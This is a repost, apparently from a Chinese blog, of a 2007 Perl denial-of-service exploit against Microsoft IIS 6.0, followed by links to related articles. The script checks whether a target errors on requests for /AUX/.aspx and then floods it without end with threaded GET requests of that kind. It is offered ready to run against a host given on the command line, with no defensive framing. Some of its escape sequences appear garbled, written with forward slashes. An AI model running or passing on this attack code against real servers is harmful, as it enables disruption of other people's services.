Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit
2007-05-30 11:47
561 查看
#When sending multiple parallel GET requests to a IIS 6.0 server requesting #/AUX/.aspx the server gets instable and non responsive. This happens only #to servers which respond a runtime error (System.Web.HttpException) #and take two or more seconds to respond to the /AUX/.aspx GET request. # # #signed, #Kingcope kingcope@gmx.net ########################################################################## ###*********************************************************************** ### ### ### ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent) ### by Kingcope, May/2007 ### Better run this from a Linux system ########################################################################## use IO::Socket; use threads; if ($ARGV[0] eq "") { exit; } my $host = $ARGV[0]; $|=1; sub sendit { $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); print $sock "GET /AUX/.aspx HTTP/1.1/r/nHost: $host/r/nConnection:close/r/n/r/n"; } $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); print $sock "GET /AUX/.aspx HTTP/1.1/r/nHost: $host/r/nConnection:close/r/n/r/n"; $k=0; while (<$sock>) { if (($_ =~ /Runtime/sError/) || ($_ =~ /HttpException/)) { $k=1; last; } } if ($k==0) { print "Server does not seem vulnerable to this attack./n"; exit; } print "ATTACK!/n"; while(1){ for (my $i=0;$i<=100;$i++) { $thr = threads->new(/&sendit); print "/r/r/r$i/100 "; } foreach $thr (threads->list) { $thr->join; } }
相关文章推荐
- MS Windows Explorer.exe Gif Image Denial of Service Exploit
- vBulletinR Version 3.8.2 Denial of Service Exploit
- [2000]MS Windows (Jolt2.c) Denial of Service Exploit
- Microsoft IIS 6.0 (/AUX/.aspx) 远程拒绝服务工具
- nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
- Slow HTTP Denial of Service Attack
- Slow HTTP Denial of Service Attack 漏洞解决办法
- How to Prevent Denial of Service(DOS) Attacks
- 【转载】网络攻击技术(三)——Denial Of Service & 哈希相关 & PHP语言 & Java语言
- DoS(Denial Of Service)***
- 网络攻击技术(三)——Denial Of Service
- 【NDN安全】Mitigating Distributed Denial-of-Service Attacks in Named Data Networking 学习笔记
- 网络攻击技术(三)——Denial Of Service
- 网络攻击技术(三)——Denial Of Service
- Hash碰撞导致的denial of service
- Development and remote installation of Java service for the Android Devices
- Slow HTTP Denial of Service Attack防御
- Slow HTTP Denial of Service Attack防御
- DOS攻击(denial-of-service)与防范
- Identifying a distributed denial of service (DDOS) attack within a network and defending against such an attack